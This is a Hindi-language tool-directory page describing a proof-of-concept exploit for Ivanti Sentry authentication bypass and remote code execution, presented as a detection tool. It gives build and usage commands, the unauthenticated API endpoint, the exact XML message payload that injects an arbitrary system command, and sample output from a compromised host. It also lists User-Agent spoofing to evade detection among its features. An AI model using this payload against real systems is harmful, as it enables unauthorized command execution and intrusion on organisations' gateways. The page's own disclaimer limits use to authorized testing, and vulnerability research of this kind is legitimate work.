Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10523-Ivanti-sentry — Ivanti Sentry प्रमाणीकरण बाईपास और दूरस्थ कोड निष्पादन भेद्यता (CVE-2026-10520, CVE-2026-10523) के लिए प्रूफ-ऑफ-कॉन्सेप्ट डिटेक्शन टूल। सिस्टम कमांड निष्पादित करने और कमजोर परिनियोजन को मान्य करने के लिए क्राफ्टेड API अनुरोध भेजता है। | Kitploit
उपकरण/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरण
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ivanti Sentry प्रमाणीकरण बाईपास और दूरस्थ कोड निष्पादन भेद्यता (CVE-2026-10520, CVE-2026-10523) के लिए प्रूफ-ऑफ-कॉन्सेप्ट डिटेक्शन टूल। सिस्टम कमांड निष्पादित करने और कमजोर परिनियोजन को मान्य करने के लिए क्राफ्टेड API अनुरोध भेजता है।

रिपॉजिटरी देखेंवेबसाइट
31143 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-10523 - Ivanti Sentry RCE डिटेक्शन टूल

Ivanti Sentry में प्रमाणीकरण बायपास और रिमोट कोड निष्पादन से संबंधित कमजोरियों के परीक्षण के लिए एक व्यापक प्रूफ-ऑफ-कॉन्सेप्ट डिटेक्शन टूल। यह टूल CVE-2026-10520 और CVE-2026-10523 के प्रति संवेदनशील सिस्टम की पहचान करता है।

अवलोकन

यह प्रोजेक्ट यह पता लगाने और सत्यापित करने के लिए डिज़ाइन किया गया है कि कोई Ivanti Sentry इंस्टेंस महत्वपूर्ण प्रमाणीकरण बायपास और रिमोट कोड निष्पादन दोषों के प्रति संवेदनशील है या नहीं। यह टूल Ivanti Sentry API एंडपॉइंट के माध्यम से विशेष रूप से तैयार किए गए संदेश भेजकर सिस्टम कमांड को निष्पादित करता है और परिणाम निकालता है, जिससे सुरक्षा शोधकर्ता और पेनिट्रेशन परीक्षक संवेदनशील डिप्लॉयमेंट की पहचान कर सकते हैं।

कमजोरी विवरण

CVE-2026-10520

Ivanti Sentry में प्रमाणीकरण बायपास कमजोरी, जो प्रतिबंधित API एंडपॉइंट्स तक अप्रमाणित पहुँच की अनुमति देती है।

CVE-2026-10523

Ivanti Sentry में रिमोट कोड निष्पादन कमजोरी, जो प्रमाणीकरण बायपास के साथ संयुक्त होने पर मैसेजिंग API के माध्यम से मनमाने सिस्टम कमांड के निष्पादन की अनुमति देती है।

विशेषताएँ

  • संवेदनशील Ivanti Sentry इंस्टेंस की अप्रमाणित पहचान
  • सिस्टम कमांड निष्पादन क्षमता (प्रूफ-ऑफ-कॉन्सेप्ट सत्यापन के लिए)
  • TLS सत्यापन बायपास के साथ HTTP और HTTPS कनेक्शन का समर्थन
  • मध्यस्थों के माध्यम से परीक्षण के लिए प्रॉक्सी समर्थन
  • XML प्रतिक्रियाओं से स्वच्छ कमांड आउटपुट निष्कर्षण
  • सूचनात्मक फीडबैक के साथ सुरक्षित त्रुटि प्रबंधन
  • कॉन्फ़िगरेबल टाइमआउट और प्रतिक्रिया आकार सीमा

आवश्यकताएँ

  • Go 1.26.4 या उच्चतर
  • लक्ष्य Ivanti Sentry इंस्टेंस तक नेटवर्क पहुँच
  • मान्य लक्ष्य URL (प्रोटोकॉल HTTP या HTTPS सहित)

स्थापना

रिपॉजिटरी को क्लोन करें और प्रोजेक्ट निर्देशिका में नेविगेट करें:

git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

इनिशियलाइज़ेशन और पैकेज लाइब्रेरी प्राप्त करें:

go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

एक्जीक्यूटेबल बनाएँ:

go build -o tot_poc tot_poc.go

उपयोग

Screen Capture

इस टूल को दो अनिवार्य पैरामीटर की आवश्यकता है: लक्ष्य URL और निष्पादित करने के लिए कमांड।

मूल उपयोग

Screen Capture

लक्ष्य पर एक सरल कमांड चलाएँ:

./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

कमांड लाइन विकल्प

  • -url (अनिवार्य): प्रोटोकॉल सहित लक्ष्य का बेस URL (जैसे, https://127.0.0.1:8443)
  • -cmd (अनिवार्य): कमजोरी का पता लगाने के लिए निष्पादित करने का कमांड (जैसे, "uname -a", "id", "whoami")
  • -p या -proxy (वैकल्पिक): ट्रैफ़िक को रूट करने के लिए प्रॉक्सी पता और पोर्ट (जैसे, 127.0.0.1:8080)

उपयोग उदाहरण

Screen Capture

सरल सिस्टम जानकारी कमांड के साथ कमजोरी का पता लगाएँ:

./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

प्रॉक्सी कॉन्फ़िगरेशन के साथ चलाएँ:

./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

सिस्टम जानकारी निकालने के लिए कमांड निष्पादित करें:

./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

आउटपुट

टूल प्रदर्शित करेगा:

  1. कमजोरी जानकारी वाला एक बैनर
  2. लक्ष्य URL, कमांड और प्रॉक्सी कॉन्फ़िगरेशन (यदि लागू हो)
  3. अनुरोध प्रगति दर्शाने वाले रीयल-टाइम स्टेटस संदेश
  4. यदि लक्ष्य संवेदनशील है तो कमांड निष्पादन के परिणाम
  5. यदि लक्ष्य संवेदनशील नहीं है या कनेक्शन विफल होता है तो त्रुटि संदेश

सफल डिटेक्शन आउटपुट

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

असफल डिटेक्शन आउटपुट

Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

तकनीकी विवरण

हमला वेक्टर

यह टूल /mics/api/v2/sentry/mics-config/handleMessage एंडपॉइंट का शोषण करता है, जो प्रमाणीकरण के बिना सुलभ है। पेलोड इस प्रकार बनाया गया है:

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

प्रतिक्रिया में कमांड आउटपुट success टैग के भीतर XML प्रारूप में होता है।

सुरक्षा सुविधाएँ

  • स्व-हस्ताक्षरित प्रमाणपत्रों के परीक्षण के लिए TLS सत्यापन बायपास
  • अनुरोधों को लटकने से रोकने के लिए कॉन्फ़िगरेबल HTTP टाइमआउट
  • मेमोरी खत्म होने से रोकने के लिए प्रतिक्रिया आकार सीमा (10 MB)
  • दोषपूर्ण प्रतिक्रियाओं के लिए उचित त्रुटि प्रबंधन
  • सरल डिटेक्शन तंत्र से बचने के लिए User-Agent स्पूफिंग

यह कैसे काम करता है

  1. लक्ष्य URL और कमांड के लिए कमांड-लाइन तर्क पार्स करें
  2. वैकल्पिक प्रॉक्सी कॉन्फ़िगरेशन के साथ HTTP क्लाइंट बनाएँ
  3. उपयोगकर्ता द्वारा प्रदान किए गए कमांड के साथ पेलोड बनाएँ
  4. संवेदनशील एंडपॉइंट पर POST अनुरोध भेजें
  5. XML प्रतिक्रिया संरचना से कमांड आउटपुट निकालें
  6. तदनुसार परिणाम या त्रुटि संदेश प्रदर्शित करें

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता पूरी तरह से यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी सिस्टम का परीक्षण करने से पहले उनके पास उचित प्राधिकरण हो। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए कोई दायित्व नहीं मानते हैं।

आवश्यकताएँ और सीमाएँ

  • लक्ष्य एक संवेदनशील Ivanti Sentry इंस्टेंस होना चाहिए
  • लक्ष्य सिस्टम तक नेटवर्क कनेक्टिविटी आवश्यक है
  • प्रति अनुरोध डिफ़ॉल्ट टाइमआउट 10 सेकंड है
  • अधिकतम प्रतिक्रिया आकार 10 MB तक सीमित है
  • केवल Ivanti Sentry के संवेदनशील संस्करणों पर प्रभावी
  • परीक्षण उद्देश्यों के लिए TLS प्रमाणपत्र सत्यापन अक्षम किया गया है

लेखक

GhostGTR666 - Gagaltotal666

रिपॉजिटरी

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

लाइसेंस

यह प्रोजेक्ट सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए जैसा है वैसा प्रदान किया गया है।

संदर्भ

  • CVE-2026-10520: Ivanti Sentry प्रमाणीकरण बायपास
  • CVE-2026-10523: Ivanti Sentry रिमोट कोड निष्पादन
टूल डाउनलोड करें